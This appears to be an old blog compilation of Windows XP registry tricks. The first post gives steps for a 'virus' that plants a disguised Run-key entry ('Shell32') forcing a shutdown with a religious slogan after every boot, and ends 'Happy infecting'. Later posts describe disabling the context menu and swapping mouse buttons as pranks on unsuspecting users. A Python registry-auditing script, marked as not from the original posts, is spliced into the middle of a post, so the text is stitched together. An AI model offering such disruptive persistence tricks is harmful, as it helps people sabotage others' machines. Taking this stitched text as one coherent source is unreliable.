    Create A Simple Virus Via Registry

    Follow the instructions below to create the virus; the steps to undo its effect are given afterwards.
    Here comes the virus:
    1. Click Start -> Run.
    2. Type regedit. Now press ENTER.
    3. Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
    4. Click on Edit Menu > New > Expanded string value

    5. Name the string value "Shell32".
    6. Now double-click on it and set its value as
    %windir%\system32\shutdown.exe -s -t 100 -c "BACK TO MASJID, BACK TO ISLAM"

    7. Restart your PC to see the effects.

    After restarting, see the effects.
    To abort the effects:
    1. You can go to START -> RUN and type shutdown -a
    2. Go to the registry key from step 3 and delete the value you created. Happy infecting, and good luck with the troubleshooting.

    9/4/2008

    How to write protect Pendrive?

    It has happened to me many times that I had to copy some files from my pen drive in our college lab, and the moment I plugged in my pen drive it got infected with dozens of viruses. Yes, it's true that our college labs are that infected. Before I can use the pen drive again, I need to clean it first so that the virus does not spread to more computers. I scan my pen drive using NOD32 and no doubt it completely removes all traces of the virus, but it wastes my time as I always have over 2 GB of files that I carry with me all the time.

    So I came to know of this trick of write protecting the drive so that I can safely copy the things I want without the worry of a virus being copied onto my USB drive. Although you won't be able to write anything to your pen drive, it's still very useful in case you want to copy something from your pen drive and don't want to get infected. Before proceeding I must tell you that playing with the registry can be harmful for your Operating System (OS) and I advise you to take a backup of your registry in case anything goes wrong. Read how to Backup Windows Registry.

    This trick works only on XP SP2 and you need to have administrator privileges.

    • Open Registry Editor by Start > Run.
    • Type in regedit.
    • Browse to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
    • Locate the sub-key StorageDevicePolicies. If it doesn't exist then create it first. Create a new key under Control by right clicking on it so that you don't create it elsewhere by mistake (as shown in the above screenshot).
    • Right click in the blank area of the sub key you just created and create a new DWORD value by the name WriteProtect.


    • Double-click it and set the value data as 1 (and 0 for disabling it).
    • Click OK, close the Registry Editor and restart the PC.

    The drawback of this trick is that you need to remember it yourself and you need to restart the PC after applying it. Killing explorer.exe and restarting it will not do the job every time. I am still looking for other ways of protecting your drives and I will post it on my blog if I find a better trick than this one. Share your thoughts in the comments.




    How to reverse the mouse buttons

    1) No context menu

    What will you see when you right click on the desktop? You will see a context menu which says arrange icons, refresh, and so on. Are you angry at your friend for not wishing you on your B'day? Do you wanna play a trick on a newbie in your family who is new to computers? This is a cool trick to play. By this tweak, you will be able to disable the right click on the desktop or any icons/files/folders/applications. But right click will work on taskbar of the start button and registry. So, don't worry!!!
    Open your registry and you will see all unknown files like HKEY_CLASSES_ROOT and so on. Don't panic. Follow this path: HKEY_CURRENT_USER>SOFTWARE>MICROSOFT>WINDOWS>CURRENTVERSION>POLICIES>EXPLORER. On the right side of the registry, you will see two files (in general) named 'default' and 'NoDriveTypeAutoRun'. Right click on the empty space in the registry, go to New>DWORD VALUE and name it "NoViewContextMenu". Remember, no spaces, and N, V, C, M should be capitals. Right click on this and click modify. The default value will be 0. Change it to 1. Note: DO NOT CHANGE THE HEXADECIMAL TO DECIMAL. Click OK. Close your registry and log out. Bingo!!! Once you log in again, right click won't work. Your friend will be perplexed and the next thing he/she does is call the system administrator, not knowing that not all system administrators know about the registry. Now, to enable it again, follow the same path and set the value to 0. Log out and then log in to see the effect.

    2) Reverse the mouse buttons
    This is a cool trick to play on newbies. Actually, there are two ways to do this. One is changing the settings in the Control panel and the other is through editing registry. You can do it either way. But I prefer the second way, which is challenging.
    (i) Through Control Panel - go to Start> Control Panel> Printers and other hardware> Mouse. In Button configuration, enable the switch primary and secondary buttons option and click OK. But remember, you have just swapped the mouse buttons. So, for OK, you have to click the right mouse button. The newbie will be perplexed. Well, this trick is good for left handers.
    (ii) Editing the registry - By default the left mouse button is the primary and the right is secondary. Open your registry and follow this path:
    HKEY_CURRENT_USER>Control Panel>Mouse and on the right side of the registry, create this String value (REG_SZ): 'SwapMouseButtons' and set its value to 1. Bingo!!! You are done. Log out/Restart the computer.

    You can try this: Combine tricks 1 and 2. That means, this will result in swapping of the mouse buttons and disabling the left click (once the buttons are swapped). The user is ready to call the system administrator cuz he feels that the system is behaving wildly.




    Why is Task Manager Disabled?

    Some time ago I received an email from a reader curious why their Task Manager option was grayed out on the taskbar right-click menu. After a bit of research his problem was solved, and now I'm sharing the solution with everybody.

    There is a registry key that will disable Task Manager, although it's not always clear how or why it was set to disable. In many cases the problem is related to spyware, so you should also scan your computer.

    Why is task manager grayed out?


    Manual Registry Hack

    Open up regedit.exe through the start menu search or run box, and then navigate down to the following key:

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System


    On the right-hand side is a 32-bit REG_DWORD value named DisableTaskMgr with one of two values:

    • 1 - Disable task manager
    • 0 - Enable task manager
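    A way to check a machine for the registry changes described in the posts above (the Run entry that calls shutdown.exe, NoViewContextMenu, SwapMouseButtons and DisableTaskMgr), as an added example that is not from the original posts. It reads the text of a registry export instead of touching the live registry; the function names and the sample export are constructed for illustration, and the message text in the sample command is a placeholder.

```python
import re

# Value name -> (key suffix it lives under, meaning when set to 1).
FLAGS = {
    "disabletaskmgr": (r"currentversion\policies\system", "Task Manager disabled"),
    "noviewcontextmenu": (r"currentversion\policies\explorer", "context menu disabled"),
    "swapmousebuttons": (r"control panel\mouse", "mouse buttons swapped"),
}


def decode_value(raw):  # right-hand side of a .reg line -> int or str
    if raw.startswith("dword:"):
        return int(raw[6:], 16)
    if raw.startswith("hex(2):"):          # REG_EXPAND_SZ, UTF-16LE bytes
        data = bytes(int(b, 16) for b in raw[7:].split(",") if b)
        return data.decode("utf-16-le").rstrip("\x00")
    if raw.startswith('"') and raw.endswith('"'):
        raw = raw[1:-1]
    return re.sub(r"\\(.)", r"\1", raw)    # REG_SZ: undo \\ and \" escapes


def audit_reg_export(text):
    """Flag this page's settings in the text of a registry export file."""
    findings, key = [], ""
    text = re.sub(r"\\\r?\n\s*", "", text)  # join wrapped hex lines
    for line in map(str.strip, text.splitlines()):
        if line.startswith("["):
            key = line.strip("[]").lower()
        m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if not m:
            continue
        name, value = m.group(1), decode_value(m.group(2))
        suffix, meaning = FLAGS.get(name.lower(), ("", ""))
        if suffix and key.endswith(suffix) and str(value) == "1":
            findings.append(f"{meaning} ({name}=1)")
        elif key.endswith(r"currentversion\run") and "shutdown" in str(value).lower():
            findings.append(f"Run entry {name} starts shutdown: {value}")
    return findings


def build_sample():
    """Constructed export; the -c message text is a placeholder."""
    cmd = '%windir%\\system32\\shutdown.exe -s -t 100 -c "MESSAGE"'
    raw = ",".join(f"{b:02x}" for b in (cmd + "\0").encode("utf-16-le"))
    hex2 = re.sub(r"((?:[0-9a-f]{2},){20})", "\\1\\\\\n  ", raw)  # wrap like regedit
    return "\n".join([
        "Windows Registry Editor Version 5.00",
        r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]",
        f'"Shell32"=hex(2):{hex2}',
        r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]",
        '"DisableTaskMgr"=dword:00000001',
        r"[HKEY_CURRENT_USER\Control Panel\Mouse]",
        '"SwapMouseButtons"="1"',
    ])
```

    Calling audit_reg_export(build_sample()) returns one finding per setting; on a real machine, feed it the text of an exported .reg file decoded to a Python string.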



     
    9/3/2008

    Booting XP from a USB drive.

    First of all we need a USB flash drive with a capacity of at least 512MB. Now we have to format the drive using FAT 32 or FAT 16, depending on the configuration of the BIOS. Then enter a name for the volume label. Then copy the boot.ini and NTDETECT.COM files from the windows directory to the flash drive.
    The second step is to create a folder, insert your Windows setup CD into the drive and copy the whole CD into the new folder. In order to produce an exact copy of Windows XP we need a utility called “NLite”. We need to install .NET Framework to install NLite. Now run NLite, select the new folder we created in the second step as the root folder and click on “Next” after it completes reading the folder, until we reach “Task Selection”. Activate the options for Service Pack and hot fixes. In order to reduce the file size, remove all “unnecessary” files which are highlighted as safe for deletion. NLite just creates a minimized copy of XP. In order to create a bootable version of XP we need another tool called “Bart’s PE”. After installing Bart’s PE, run “PEBuilder”, make sure that the USB flash drive is plugged in, select the folder we created in the second step as the source and deactivate the “Create Iso” and “Burn to CD” options. Click on the build option and Windows is ready to boot from a USB flash drive.
    Note: To include some useful tools like Firefox, follow these steps. First of all download the plug-in for the utility you want to install and copy it to the Plug-in folder of your Bart’s PE installation. There are plug-ins for other applications too. Just activate the plug-in for the tools you want to install. Read the help file associated with each plug-in, which describes how to install that plug-in.